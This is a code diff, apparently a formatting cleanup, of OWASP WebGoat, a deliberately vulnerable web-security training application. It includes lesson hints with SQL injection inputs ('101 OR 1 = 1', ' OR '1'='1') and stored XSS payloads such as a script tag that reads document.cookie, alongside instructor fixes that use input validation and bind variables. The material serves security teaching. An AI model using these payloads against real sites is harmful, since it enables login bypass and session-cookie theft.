hints.add("Compound SQL statements can be made by joining multiple tests with keywords like AND and OR. "
|
||||
+ "Try appending a SQL statement that always resolves to true.");
|
||||
hints.add("Try to intercept the post request with WebScarab and replace the station " +
|
||||
"with 101 OR 1 = 1");
|
||||
hints.add("Try to intercept the post request with WebScarab and replace the station " + "with 101 OR 1 = 1");
|
||||
|
||||
return hints;
|
||||
}
|
||||
|
||||
@ -79,6 +79,7 @@ public class StoredXss extends LessonAdapter
|
||||
private static int count = 1;
|
||||
|
||||
private final static int USER_COL = 4; // Added by Chuck Willis - used to show user who posted
|
||||
|
||||
// message
|
||||
|
||||
/**
|
||||
@ -160,7 +161,8 @@ public class StoredXss extends LessonAdapter
|
||||
List<String> hints = new ArrayList<String>();
|
||||
hints.add("You can put HTML tags in your message.");
|
||||
hints.add("Bury a SCRIPT tag in the message to attack anyone who reads it.");
|
||||
hints.add("Enter this: <script language=\"javascript\" type=\"text/javascript\">alert(\"Ha Ha Ha\");</script> in the message field.");
|
||||
hints
|
||||
.add("Enter this: <script language=\"javascript\" type=\"text/javascript\">alert(\"Ha Ha Ha\");</script> in the message field.");
|
||||
hints.add("Enter this: <script>alert(document.cookie);</script> in the message field.");
|
||||
|
||||
return hints;
|
||||
|
||||
@ -131,7 +131,8 @@ public class UncheckedEmail extends LessonAdapter
|
||||
s.setMessage("The attack worked! Now try to attack another person than the admin.");
|
||||
}
|
||||
|
||||
// only complete the lesson if they changed the "to" hidden field and they sen a scripttag in the message
|
||||
// only complete the lesson if they changed the "to" hidden field and they sen a
|
||||
// scripttag in the message
|
||||
if (to.length() > 0 && !"webgoat.admin@owasp.org".equals(to) && message.contains("<script"))
|
||||
{
|
||||
makeSuccess(s);
|
||||
|
||||
@ -65,8 +65,8 @@ import org.owasp.webgoat.session.WebgoatContext;
|
||||
*
|
||||
* @author asmolen
|
||||
*
|
||||
* TODO To change the template for this generated type comment go to Window - Preferences - Java -
|
||||
* Code Style - Code Templates
|
||||
* TODO To change the template for this generated type comment go to Window - Preferences -
|
||||
* Java - Code Style - Code Templates
|
||||
*/
|
||||
public class WSDLScanning extends LessonAdapter
|
||||
{
|
||||
|
||||
@ -141,7 +141,6 @@ public class WelcomeScreen extends Screen
|
||||
|
||||
/*
|
||||
* (non-Javadoc)
|
||||
*
|
||||
* @see session.Screen#getRole()
|
||||
*/
|
||||
public String getRole()
|
||||
|
||||
@ -56,8 +56,8 @@ import org.xml.sax.helpers.XMLReaderFactory;
|
||||
*
|
||||
* @author rdawes
|
||||
*
|
||||
* TODO To change the template for this generated type comment go to Window - Preferences - Java -
|
||||
* Code Style - Code Templates
|
||||
* TODO To change the template for this generated type comment go to Window - Preferences -
|
||||
* Java - Code Style - Code Templates
|
||||
*/
|
||||
public class WsSAXInjection extends LessonAdapter
|
||||
{
|
||||
|
||||
@ -55,8 +55,8 @@ import org.owasp.webgoat.session.WebgoatContext;
|
||||
*
|
||||
* @author asmolen
|
||||
*
|
||||
* TODO To change the template for this generated type comment go to Window - Preferences - Java -
|
||||
* Code Style - Code Templates
|
||||
* TODO To change the template for this generated type comment go to Window - Preferences -
|
||||
* Java - Code Style - Code Templates
|
||||
*/
|
||||
public class WsSqlInjection extends LessonAdapter
|
||||
{
|
||||
@ -72,7 +72,6 @@ public class WsSqlInjection extends LessonAdapter
|
||||
|
||||
/*
|
||||
* (non-Javadoc)
|
||||
*
|
||||
* @see lessons.AbstractLesson#getMenuItem()
|
||||
*/
|
||||
static boolean completed;
|
||||
|
||||
@ -1,8 +1,7 @@
|
||||
|
||||
package org.owasp.webgoat.lessons.instructor.CrossSiteScripting;
|
||||
|
||||
|
||||
import java.util.regex.Pattern;
|
||||
|
||||
import org.owasp.webgoat.lessons.CrossSiteScripting.FindProfile;
|
||||
import org.owasp.webgoat.lessons.GoatHillsFinancial.GoatHillsFinancial;
|
||||
import org.owasp.webgoat.lessons.GoatHillsFinancial.LessonAction;
|
||||
@ -10,23 +9,15 @@ import org.owasp.webgoat.session.ParameterNotFoundException;
|
||||
import org.owasp.webgoat.session.ValidationException;
|
||||
import org.owasp.webgoat.session.WebSession;
|
||||
|
||||
/* STAGE 5 FIXES
|
||||
Solution Summary: Edit FindProfile.java and change getRequestParameter().
|
||||
Modify getRequestParameter() with lines denoted by // STAGE 5 - FIX.
|
||||
Solution Steps:
|
||||
1. Talk about the different parser methods. We could have used the parser method that takes a regular expression.
|
||||
2. Call validate on the request parameter.
|
||||
return validate(s.getParser().getRawParameter(name), (Pattern) patterns.get(name));
|
||||
|
||||
Note: patterns.get(name) is used to fetch the XSS validation pattern that is defined
|
||||
in FindProfile.Java
|
||||
|
||||
protected static Map patterns = new HashMap();
|
||||
static
|
||||
{
|
||||
patterns.put(CrossSiteScripting.SEARCHNAME, Pattern.compile("[a-zA-Z ]{0,20}"));
|
||||
}
|
||||
|
||||
/*
|
||||
* STAGE 5 FIXES Solution Summary: Edit FindProfile.java and change getRequestParameter(). Modify
|
||||
* getRequestParameter() with lines denoted by // STAGE 5 - FIX. Solution Steps: 1. Talk about the
|
||||
* different parser methods. We could have used the parser method that takes a regular expression.
|
||||
* 2. Call validate on the request parameter. return validate(s.getParser().getRawParameter(name),
|
||||
* (Pattern) patterns.get(name)); Note: patterns.get(name) is used to fetch the XSS validation
|
||||
* pattern that is defined in FindProfile.Java protected static Map patterns = new HashMap(); static
|
||||
* { patterns.put(CrossSiteScripting.SEARCHNAME, Pattern.compile("[a-zA-Z ]{0,20}")); }
|
||||
*/
|
||||
|
||||
public class FindProfile_i extends FindProfile
|
||||
@ -36,8 +27,8 @@ public class FindProfile_i extends FindProfile
|
||||
super(lesson, lessonName, actionName, chainedAction);
|
||||
}
|
||||
|
||||
protected String getRequestParameter(WebSession s, String name)
|
||||
throws ParameterNotFoundException, ValidationException
|
||||
protected String getRequestParameter(WebSession s, String name) throws ParameterNotFoundException,
|
||||
ValidationException
|
||||
{
|
||||
// NOTE:
|
||||
//
|
||||
|
||||
@ -1,9 +1,8 @@
|
||||
|
||||
package org.owasp.webgoat.lessons.instructor.CrossSiteScripting;
|
||||
|
||||
import java.util.regex.Pattern;
|
||||
|
||||
import javax.servlet.http.HttpServletRequest;
|
||||
|
||||
import org.owasp.webgoat.lessons.CrossSiteScripting.CrossSiteScripting;
|
||||
import org.owasp.webgoat.lessons.CrossSiteScripting.UpdateProfile;
|
||||
import org.owasp.webgoat.lessons.GoatHillsFinancial.GoatHillsFinancial;
|
||||
@ -14,29 +13,19 @@ import org.owasp.webgoat.session.ParameterParser;
|
||||
import org.owasp.webgoat.session.ValidationException;
|
||||
import org.owasp.webgoat.session.WebSession;
|
||||
|
||||
/* STAGE 2 FIXES
|
||||
Solution Summary: Edit UpdateProfile.java and change parseEmployeeProfile().
|
||||
Modify parseEmployeeProfile() with lines denoted by // STAGE 2 - FIX.
|
||||
Solution Steps:
|
||||
1. Talk about the different parser methods.
|
||||
a. parseEmployeeProfile(subjectId, s.getRequest())
|
||||
- uses the request object directly.
|
||||
- calling validate() on the appropriate parameter
|
||||
b. parseEmployeeProfile(subjectId, s.getParser())
|
||||
- uses the parser object to pull request data (centralized mechanism)
|
||||
|
||||
2. Fix the request object version of the call // STAGE 2 - FIX
|
||||
Replace the call to:
|
||||
String address1 = request.getParameter(CrossSiteScripting.ADDRESS1);
|
||||
|
||||
With:
|
||||
final Pattern PATTERN_ADDRESS1 = Pattern.compile("[a-zA-Z0-9,\\.\\- ]{0,80}"); // STAGE 2 - FIX
|
||||
String address1 = validate(request.getParameter(CrossSiteScripting.ADDRESS1), PATTERN_ADDRESS1); // STAGE 2 - FIX
|
||||
|
||||
|
||||
3. Fix the parser version of the call. // STAGE 2 - ALTERNATE FIX
|
||||
Change all calls in parseEmployeeProfile(subjectId, s.getParser()) to use
|
||||
the appropriate parser.method() call
|
||||
/*
|
||||
* STAGE 2 FIXES Solution Summary: Edit UpdateProfile.java and change parseEmployeeProfile(). Modify
|
||||
* parseEmployeeProfile() with lines denoted by // STAGE 2 - FIX. Solution Steps: 1. Talk about the
|
||||
* different parser methods. a. parseEmployeeProfile(subjectId, s.getRequest()) - uses the request
|
||||
* object directly. - calling validate() on the appropriate parameter b.
|
||||
* parseEmployeeProfile(subjectId, s.getParser()) - uses the parser object to pull request data
|
||||
* (centralized mechanism) 2. Fix the request object version of the call // STAGE 2 - FIX Replace
|
||||
* the call to: String address1 = request.getParameter(CrossSiteScripting.ADDRESS1); With: final
|
||||
* Pattern PATTERN_ADDRESS1 = Pattern.compile("[a-zA-Z0-9,\\.\\- ]{0,80}"); // STAGE 2 - FIX String
|
||||
* address1 = validate(request.getParameter(CrossSiteScripting.ADDRESS1), PATTERN_ADDRESS1); //
|
||||
* STAGE 2 - FIX 3. Fix the parser version of the call. // STAGE 2 - ALTERNATE FIX Change all calls
|
||||
* in parseEmployeeProfile(subjectId, s.getParser()) to use the appropriate parser.method() call
|
||||
*/
|
||||
|
||||
public class UpdateProfile_i extends UpdateProfile
|
||||
@ -46,8 +35,8 @@ public class UpdateProfile_i extends UpdateProfile
|
||||
super(lesson, lessonName, actionName, chainedAction);
|
||||
}
|
||||
|
||||
|
||||
protected Employee parseEmployeeProfile(int subjectId, WebSession s) throws ParameterNotFoundException, ValidationException
|
||||
protected Employee parseEmployeeProfile(int subjectId, WebSession s) throws ParameterNotFoundException,
|
||||
ValidationException
|
||||
{
|
||||
HttpServletRequest request = s.getRequest();
|
||||
String firstName = request.getParameter(CrossSiteScripting.FIRST_NAME);
|
||||
@ -56,9 +45,14 @@ public class UpdateProfile_i extends UpdateProfile
|
||||
String title = request.getParameter(CrossSiteScripting.TITLE);
|
||||
String phone = request.getParameter(CrossSiteScripting.PHONE_NUMBER);
|
||||
|
||||
// Validate this parameter against a regular expression pattern designed for street addresses.
|
||||
final Pattern PATTERN_ADDRESS1 = Pattern.compile("[a-zA-Z0-9,\\.\\- ]{0,80}"); // STAGE 2 - FIX
|
||||
String address1 = validate(request.getParameter(CrossSiteScripting.ADDRESS1), PATTERN_ADDRESS1); // STAGE 2 - FIX
|
||||
// Validate this parameter against a regular expression pattern designed for street
|
||||
// addresses.
|
||||
final Pattern PATTERN_ADDRESS1 = Pattern.compile("[a-zA-Z0-9,\\.\\- ]{0,80}"); // STAGE 2 -
|
||||
// FIX
|
||||
String address1 = validate(request.getParameter(CrossSiteScripting.ADDRESS1), PATTERN_ADDRESS1); // STAGE
|
||||
// 2
|
||||
// -
|
||||
// FIX
|
||||
|
||||
String address2 = request.getParameter(CrossSiteScripting.ADDRESS2);
|
||||
int manager = Integer.parseInt(request.getParameter(CrossSiteScripting.MANAGER));
|
||||
@ -70,16 +64,15 @@ public class UpdateProfile_i extends UpdateProfile
|
||||
String disciplinaryActionNotes = request.getParameter(CrossSiteScripting.DISCIPLINARY_NOTES);
|
||||
String personalDescription = request.getParameter(CrossSiteScripting.DESCRIPTION);
|
||||
|
||||
Employee employee = new Employee(subjectId, firstName, lastName, ssn, title, phone,
|
||||
address1, address2, manager, startDate, salary,
|
||||
ccn, ccnLimit, disciplinaryActionDate, disciplinaryActionNotes,
|
||||
Employee employee = new Employee(subjectId, firstName, lastName, ssn, title, phone, address1, address2,
|
||||
manager, startDate, salary, ccn, ccnLimit, disciplinaryActionDate, disciplinaryActionNotes,
|
||||
personalDescription);
|
||||
|
||||
return employee;
|
||||
}
|
||||
|
||||
protected Employee parseEmployeeProfile(int subjectId, ParameterParser parser)
|
||||
throws ParameterNotFoundException, ValidationException
|
||||
protected Employee parseEmployeeProfile(int subjectId, ParameterParser parser) throws ParameterNotFoundException,
|
||||
ValidationException
|
||||
{
|
||||
// STAGE 2 - ALTERNATE FIX
|
||||
String firstName = parser.getStrictAlphaParameter(CrossSiteScripting.FIRST_NAME, 20);
|
||||
@ -98,9 +91,8 @@ public class UpdateProfile_i extends UpdateProfile
|
||||
String disciplinaryActionNotes = parser.getStrictAlphaParameter(CrossSiteScripting.DISCIPLINARY_NOTES, 60);
|
||||
String personalDescription = parser.getStrictAlphaParameter(CrossSiteScripting.DESCRIPTION, 60);
|
||||
|
||||
Employee employee = new Employee(subjectId, firstName, lastName, ssn, title, phone,
|
||||
address1, address2, manager, startDate, salary,
|
||||
ccn, ccnLimit, disciplinaryActionDate, disciplinaryActionNotes,
|
||||
Employee employee = new Employee(subjectId, firstName, lastName, ssn, title, phone, address1, address2,
|
||||
manager, startDate, salary, ccn, ccnLimit, disciplinaryActionDate, disciplinaryActionNotes,
|
||||
personalDescription);
|
||||
|
||||
return employee;
|
||||
|
||||
@ -1,13 +1,13 @@
|
||||
|
||||
package org.owasp.webgoat.lessons.instructor.CrossSiteScripting;
|
||||
|
||||
import org.owasp.webgoat.lessons.CrossSiteScripting.ViewProfile;
|
||||
import org.owasp.webgoat.lessons.GoatHillsFinancial.GoatHillsFinancial;
|
||||
|
||||
/* STAGE 4 FIXES
|
||||
Solution Summary: Look in the WebContent/lesson/CrossSiteScripting/ViewProfile.jsp
|
||||
|
||||
Look for the <-- STAGE 4 - FIX in the ViewProfile.jsp
|
||||
|
||||
/*
|
||||
* STAGE 4 FIXES Solution Summary: Look in the WebContent/lesson/CrossSiteScripting/ViewProfile.jsp
|
||||
* Look for the <-- STAGE 4 - FIX in the ViewProfile.jsp
|
||||
*/
|
||||
|
||||
public class ViewProfile_i extends ViewProfile
|
||||
|
||||
@ -1,130 +1,58 @@
|
||||
|
||||
package org.owasp.webgoat.lessons.instructor.DBCrossSiteScripting;
|
||||
|
||||
import org.owasp.webgoat.lessons.GoatHillsFinancial.LessonAction;
|
||||
import org.owasp.webgoat.lessons.CrossSiteScripting.UpdateProfile;
|
||||
import org.owasp.webgoat.lessons.GoatHillsFinancial.GoatHillsFinancial;
|
||||
|
||||
/* STAGE 2 FIXES
|
||||
Solution Summary (1. or 2.)
|
||||
1. Modify the UPDATE_EMPLOYEE stored procedure in the database and add
|
||||
a validation step. Oracle 10G now supports regular expressions.
|
||||
2. Apply a column constraint can also work IFF the existing data is clean
|
||||
|
||||
Solution Steps:
|
||||
1. Talk about the different database approaches.
|
||||
a. Apply validation in the UPDATE stored proc
|
||||
- Possible to bypass by not using that stored proc
|
||||
|
||||
b. Apply a table column constraint
|
||||
- Cannot be bypassed. The DB enforces the constraint under all conditions
|
||||
|
||||
2. Fix the stored proc
|
||||
|
||||
Define the pattern.
|
||||
Validate the field against the pattern.
|
||||
Raise an exception if invalid.
|
||||
|
||||
CREATE OR REPLACE PROCEDURE UPDATE_EMPLOYEE(
|
||||
v_userid IN employee.userid%type,
|
||||
v_first_name IN employee.first_name%type,
|
||||
v_last_name IN employee.last_name%type,
|
||||
v_ssn IN employee.ssn%type,
|
||||
v_title IN employee.title%type,
|
||||
v_phone IN employee.phone%type,
|
||||
v_address1 IN employee.address1%type,
|
||||
v_address2 IN employee.address2%type,
|
||||
v_manager IN employee.manager%type,
|
||||
v_start_date IN employee.start_date%type,
|
||||
v_salary IN employee.salary%type,
|
||||
v_ccn IN employee.ccn%type,
|
||||
v_ccn_limit IN employee.ccn_limit%type,
|
||||
v_disciplined_date IN employee.disciplined_date%type,
|
||||
v_disciplined_notes IN employee.disciplined_notes%type,
|
||||
v_personal_description IN employee.personal_description%type
|
||||
)
|
||||
AS
|
||||
P_ADDRESS1 VARCHAR2(100) := '^[a-zA-Z0-9,\. ]{0,80}$';
|
||||
BEGIN
|
||||
IF NOT REGEXP_LIKE(v_address1, P_ADDRESS1) THEN
|
||||
RAISE VALUE_ERROR;
|
||||
END IF;
|
||||
UPDATE EMPLOYEE
|
||||
SET
|
||||
first_name = v_first_name,
|
||||
last_name = v_last_name,
|
||||
ssn = v_ssn,
|
||||
title = v_title,
|
||||
phone = v_phone,
|
||||
address1 = v_address1,
|
||||
address2 = v_address2,
|
||||
manager = v_manager,
|
||||
start_date = v_Start_date,
|
||||
salary = v_salary,
|
||||
ccn = v_ccn,
|
||||
ccn_limit = v_ccn_limit,
|
||||
disciplined_date = v_disciplined_date,
|
||||
disciplined_notes = v_disciplined_notes,
|
||||
personal_description = v_personal_description
|
||||
WHERE
|
||||
userid = v_userid;
|
||||
END;
|
||||
/
|
||||
|
||||
3. Apply a table column constraint
|
||||
ALTER TABLE EMPLOYEE
|
||||
ADD CONSTRAINT address1_ck CHECK (REGEXP_LIKE(address1, '^[a-zA-Z0-9,\. ]{0,80}$'));
|
||||
|
||||
|
||||
FOR SQL SERVER, the following is required:
|
||||
|
||||
|
||||
DROP PROCEDURE webgoat_guest.UPDATE_EMPLOYEE
|
||||
GO
|
||||
|
||||
CREATE PROCEDURE webgoat_guest.UPDATE_EMPLOYEE
|
||||
@v_userid INT,
|
||||
@v_first_name VARCHAR(20),
|
||||
@v_last_name VARCHAR(20),
|
||||
@v_ssn VARCHAR(12),
|
||||
@v_title VARCHAR(20),
|
||||
@v_phone VARCHAR(13),
|
||||
@v_address1 VARCHAR(80),
|
||||
@v_address2 VARCHAR(80),
|
||||
@v_manager INT,
|
||||
@v_start_date CHAR(8),
|
||||
@v_salary INT,
|
||||
@v_ccn VARCHAR(30),
|
||||
@v_ccn_limit INT,
|
||||
@v_disciplined_date CHAR(8),
|
||||
@v_disciplined_notes VARCHAR(60),
|
||||
@v_personal_description VARCHAR(60)
|
||||
AS
|
||||
IF [webgoat_guest].RegexMatch(@v_address1, N'^[a-zA-Z0-9,\. ]{0,80}$') = 0
|
||||
BEGIN
|
||||
RAISERROR('Illegal characters in address1', 11, 1)
|
||||
RETURN
|
||||
END
|
||||
UPDATE EMPLOYEE
|
||||
SET
|
||||
first_name = @v_first_name,
|
||||
last_name = @v_last_name,
|
||||
ssn = @v_ssn,
|
||||
title = @v_title,
|
||||
phone = @v_phone,
|
||||
address1 = @v_address1,
|
||||
address2 = @v_address2,
|
||||
manager = @v_manager,
|
||||
start_date = @v_Start_date,
|
||||
salary = @v_salary,
|
||||
ccn = @v_ccn,
|
||||
ccn_limit = @v_ccn_limit,
|
||||
disciplined_date = @v_disciplined_date,
|
||||
disciplined_notes = @v_disciplined_notes,
|
||||
personal_description = @v_personal_description
|
||||
WHERE
|
||||
userid = @v_userid;
|
||||
GO
|
||||
|
||||
/*
|
||||
* STAGE 2 FIXES Solution Summary (1. or 2.) 1. Modify the UPDATE_EMPLOYEE stored procedure in the
|
||||
* database and add a validation step. Oracle 10G now supports regular expressions. 2. Apply a
|
||||
* column constraint can also work IFF the existing data is clean Solution Steps: 1. Talk about the
|
||||
* different database approaches. a. Apply validation in the UPDATE stored proc - Possible to bypass
|
||||
* by not using that stored proc b. Apply a table column constraint - Cannot be bypassed. The DB
|
||||
* enforces the constraint under all conditions 2. Fix the stored proc Define the pattern. Validate
|
||||
* the field against the pattern. Raise an exception if invalid. CREATE OR REPLACE PROCEDURE
|
||||
* UPDATE_EMPLOYEE( v_userid IN employee.userid%type, v_first_name IN employee.first_name%type,
|
||||
* v_last_name IN employee.last_name%type, v_ssn IN employee.ssn%type, v_title IN
|
||||
* employee.title%type, v_phone IN employee.phone%type, v_address1 IN employee.address1%type,
|
||||
* v_address2 IN employee.address2%type, v_manager IN employee.manager%type, v_start_date IN
|
||||
* employee.start_date%type, v_salary IN employee.salary%type, v_ccn IN employee.ccn%type,
|
||||
* v_ccn_limit IN employee.ccn_limit%type, v_disciplined_date IN employee.disciplined_date%type,
|
||||
* v_disciplined_notes IN employee.disciplined_notes%type, v_personal_description IN
|
||||
* employee.personal_description%type ) AS P_ADDRESS1 VARCHAR2(100) := '^[a-zA-Z0-9,\. ]{0,80}$';
|
||||
* BEGIN IF NOT REGEXP_LIKE(v_address1, P_ADDRESS1) THEN RAISE VALUE_ERROR; END IF; UPDATE EMPLOYEE
|
||||
* SET first_name = v_first_name, last_name = v_last_name, ssn = v_ssn, title = v_title, phone =
|
||||
* v_phone, address1 = v_address1, address2 = v_address2, manager = v_manager, start_date =
|
||||
* v_Start_date, salary = v_salary, ccn = v_ccn, ccn_limit = v_ccn_limit, disciplined_date =
|
||||
* v_disciplined_date, disciplined_notes = v_disciplined_notes, personal_description =
|
||||
* v_personal_description WHERE userid = v_userid; END; / 3. Apply a table column constraint ALTER
|
||||
* TABLE EMPLOYEE ADD CONSTRAINT address1_ck CHECK (REGEXP_LIKE(address1, '^[a-zA-Z0-9,\.
|
||||
* ]{0,80}$')); FOR SQL SERVER, the following is required: DROP PROCEDURE
|
||||
* webgoat_guest.UPDATE_EMPLOYEE GO CREATE PROCEDURE webgoat_guest.UPDATE_EMPLOYEE
|
||||
* @v_userid INT,
|
||||
* @v_first_name VARCHAR(20),
|
||||
* @v_last_name VARCHAR(20),
|
||||
* @v_ssn VARCHAR(12),
|
||||
* @v_title VARCHAR(20),
|
||||
* @v_phone VARCHAR(13),
|
||||
* @v_address1 VARCHAR(80),
|
||||
* @v_address2 VARCHAR(80),
|
||||
* @v_manager INT,
|
||||
* @v_start_date CHAR(8),
|
||||
* @v_salary INT,
|
||||
* @v_ccn VARCHAR(30),
|
||||
* @v_ccn_limit INT,
|
||||
* @v_disciplined_date CHAR(8),
|
||||
* @v_disciplined_notes VARCHAR(60),
|
||||
* @v_personal_description VARCHAR(60) AS IF [webgoat_guest].RegexMatch(@v_address1,
|
||||
* N'^[a-zA-Z0-9,\. ]{0,80}$') = 0 BEGIN RAISERROR('Illegal characters in address1', 11, 1) RETURN
|
||||
* END UPDATE EMPLOYEE SET first_name = @v_first_name, last_name = @v_last_name, ssn = @v_ssn, title
|
||||
* = @v_title, phone = @v_phone, address1 = @v_address1, address2 = @v_address2, manager =
|
||||
* @v_manager, start_date = @v_Start_date, salary = @v_salary, ccn = @v_ccn, ccn_limit =
|
||||
* @v_ccn_limit, disciplined_date = @v_disciplined_date, disciplined_notes = @v_disciplined_notes,
|
||||
* personal_description = @v_personal_description WHERE userid = @v_userid; GO
|
||||
*/
|
||||
|
||||
public class UpdateProfile_i extends UpdateProfile
|
||||
|
||||
@ -1,44 +1,17 @@
|
||||
|
||||
package org.owasp.webgoat.lessons.instructor.DBSQLInjection;
|
||||
|
||||
/*
|
||||
* The solution is to choose Neville's userid, and enter a password like:
|
||||
* ' OR '1'='1
|
||||
* Modify the Stored function LOGIN_EMPLOYEE to use fixed statements or bind variables
|
||||
*
|
||||
*
|
||||
* For ORACLE:
|
||||
CREATE OR REPLACE FUNCTION WEBGOAT_guest.EMPLOYEE_LOGIN(v_id NUMBER, v_password VARCHAR) RETURN NUMBER AS
|
||||
cnt NUMBER;
|
||||
BEGIN
|
||||
SELECT COUNT(*) INTO cnt FROM EMPLOYEE
|
||||
WHERE USERID = v_id
|
||||
AND PASSWORD = v_password;
|
||||
RETURN cnt;
|
||||
END;
|
||||
/
|
||||
|
||||
* OR
|
||||
|
||||
CREATE OR REPLACE FUNCTION WEBGOAT_guest.EMPLOYEE_LOGIN(v_id NUMBER, v_password VARCHAR) RETURN NUMBER AS
|
||||
stmt VARCHAR(32767); cnt NUMBER;
|
||||
BEGIN
|
||||
stmt := 'SELECT COUNT (*) FROM EMPLOYEE WHERE USERID = :1 AND PASSWORD = :2';
|
||||
EXECUTE IMMEDIATE stmt INTO cnt USING v_id, v_password;
|
||||
RETURN cnt;
|
||||
END;
|
||||
/
|
||||
|
||||
* For SQL SERVER
|
||||
|
||||
CREATE FUNCTION webgoat_guest.EMPLOYEE_LOGIN (
|
||||
@v_id INT,
|
||||
@v_password VARCHAR(100)
|
||||
) RETURNS INTEGER
|
||||
AS
|
||||
BEGIN
|
||||
DECLARE @count int
|
||||
SELECT @count = COUNT(*) FROM EMPLOYEE WHERE USERID = @v_id AND PASSWORD = @v_password;
|
||||
return @count
|
||||
END
|
||||
|
||||
* The solution is to choose Neville's userid, and enter a password like: ' OR '1'='1 Modify the
|
||||
* Stored function LOGIN_EMPLOYEE to use fixed statements or bind variables For ORACLE: CREATE OR
|
||||
* REPLACE FUNCTION WEBGOAT_guest.EMPLOYEE_LOGIN(v_id NUMBER, v_password VARCHAR) RETURN NUMBER AS
|
||||
* cnt NUMBER; BEGIN SELECT COUNT() INTO cnt FROM EMPLOYEE WHERE USERID = v_id AND PASSWORD =
|
||||
* v_password; RETURN cnt; END; / OR CREATE OR REPLACE FUNCTION WEBGOAT_guest.EMPLOYEE_LOGIN(v_id
|
||||
* NUMBER, v_password VARCHAR) RETURN NUMBER AS stmt VARCHAR(32767); cnt NUMBER; BEGIN stmt :=
|
||||
* 'SELECT COUNT () FROM EMPLOYEE WHERE USERID = :1 AND PASSWORD = :2'; EXECUTE IMMEDIATE stmt INTO
|
||||
* cnt USING v_id, v_password; RETURN cnt; END; / For SQL SERVER CREATE FUNCTION
|
||||
* webgoat_guest.EMPLOYEE_LOGIN (
|
||||
* @v_id INT,
|
||||
* @v_password VARCHAR(100) ) RETURNS INTEGER AS BEGIN DECLARE @count int SELECT @count = COUNT()
|
||||
* FROM EMPLOYEE WHERE USERID = @v_id AND PASSWORD = @v_password; return @count END
|
||||
*/
|
||||
|
||||
@ -1,9 +1,9 @@
|
||||
|
||||
package org.owasp.webgoat.lessons.instructor.RoleBasedAccessControl;
|
||||
|
||||
import java.sql.ResultSet;
|
||||
import java.sql.SQLException;
|
||||
import java.sql.Statement;
|
||||
|
||||
import org.owasp.webgoat.lessons.GoatHillsFinancial.GoatHillsFinancial;
|
||||
import org.owasp.webgoat.lessons.GoatHillsFinancial.LessonAction;
|
||||
import org.owasp.webgoat.lessons.RoleBasedAccessControl.DeleteProfile;
|
||||
@ -11,17 +11,16 @@ import org.owasp.webgoat.lessons.RoleBasedAccessControl.RoleBasedAccessControl;
|
||||
import org.owasp.webgoat.session.UnauthorizedException;
|
||||
import org.owasp.webgoat.session.WebSession;
|
||||
|
||||
|
||||
public class DeleteProfile_i extends DeleteProfile
|
||||
{
|
||||
|
||||
|
||||
public DeleteProfile_i(GoatHillsFinancial lesson, String lessonName, String actionName, LessonAction chainedAction)
|
||||
{
|
||||
super(lesson, lessonName, actionName, chainedAction);
|
||||
}
|
||||
|
||||
public void doDeleteEmployeeProfile(WebSession s, int userId, int employeeId)
|
||||
throws UnauthorizedException
|
||||
public void doDeleteEmployeeProfile(WebSession s, int userId, int employeeId) throws UnauthorizedException
|
||||
{
|
||||
if (s.isAuthorizedInLesson(userId, RoleBasedAccessControl.DELETEPROFILE_ACTION)) // FIX
|
||||
{
|
||||
@ -31,16 +30,15 @@ public class DeleteProfile_i extends DeleteProfile
|
||||
// System.out.println("Query: " + query);
|
||||
try
|
||||
{
|
||||
Statement statement = WebSession.getConnection(s).createStatement( ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY );
|
||||
Statement statement = WebSession.getConnection(s)
|
||||
.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
|
||||
statement.executeUpdate(query);
|
||||
}
|
||||
catch ( SQLException sqle )
|
||||
} catch (SQLException sqle)
|
||||
{
|
||||
s.setMessage("Error deleting employee profile");
|
||||
sqle.printStackTrace();
|
||||
}
|
||||
}
|
||||
catch ( Exception e )
|
||||
} catch (Exception e)
|
||||
{
|
||||
s.setMessage("Error deleting employee profile");
|
||||
e.printStackTrace();
|
||||
|
||||
@ -1,9 +1,9 @@
|
||||
|
||||
package org.owasp.webgoat.lessons.instructor.RoleBasedAccessControl;
|
||||
|
||||
import java.sql.PreparedStatement;
|
||||
import java.sql.ResultSet;
|
||||
import java.sql.SQLException;
|
||||
|
||||
import org.owasp.webgoat.lessons.GoatHillsFinancial.GoatHillsFinancial;
|
||||
import org.owasp.webgoat.lessons.RoleBasedAccessControl.EditProfile;
|
||||
import org.owasp.webgoat.lessons.RoleBasedAccessControl.RoleBasedAccessControl;
|
||||
@ -11,11 +11,12 @@ import org.owasp.webgoat.session.Employee;
|
||||
import org.owasp.webgoat.session.UnauthorizedException;
|
||||
import org.owasp.webgoat.session.WebSession;
|
||||
|
||||
|
||||
/**
|
||||
* Copyright (c) 2006 Free Software Foundation developed under the custody of the Open Web
|
||||
* Application Security Project (http://www.owasp.org) This software package org.owasp.webgoat.is published by OWASP
|
||||
* under the GPL. You should read and accept the LICENSE before you use, modify and/or redistribute
|
||||
* this software.
|
||||
* Application Security Project (http://www.owasp.org) This software package org.owasp.webgoat.is
|
||||
* published by OWASP under the GPL. You should read and accept the LICENSE before you use, modify
|
||||
* and/or redistribute this software.
|
||||
*
|
||||
*/
|
||||
|
||||
@ -32,11 +33,11 @@ public class EditProfile_i extends EditProfile
|
||||
super(lesson, lessonName, actionName);
|
||||
}
|
||||
|
||||
public Employee getEmployeeProfile(WebSession s, int userId, int subjectUserId)
|
||||
throws UnauthorizedException
|
||||
public Employee getEmployeeProfile(WebSession s, int userId, int subjectUserId) throws UnauthorizedException
|
||||
{
|
||||
// Query the database to determine if this employee has access to this function
|
||||
// Query the database for the profile data of the given employee if "owned" by the given user
|
||||
// Query the database for the profile data of the given employee if "owned" by the given
|
||||
// user
|
||||
|
||||
Employee profile = null;
|
||||
|
||||
@ -49,42 +50,33 @@ public class EditProfile_i extends EditProfile
|
||||
|
||||
try
|
||||
{
|
||||
PreparedStatement answer_statement = WebSession.getConnection(s).prepareStatement( query,
|
||||
ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY );
|
||||
PreparedStatement answer_statement = WebSession.getConnection(s)
|
||||
.prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
|
||||
answer_statement.setInt(1, subjectUserId);
|
||||
ResultSet answer_results = answer_statement.executeQuery();
|
||||
if (answer_results.next())
|
||||
{
|
||||
// Note: Do NOT get the password field.
|
||||
profile = new Employee(
|
||||
answer_results.getInt("userid"),
|
||||
answer_results.getString("first_name"),
|
||||
answer_results.getString("last_name"),
|
||||
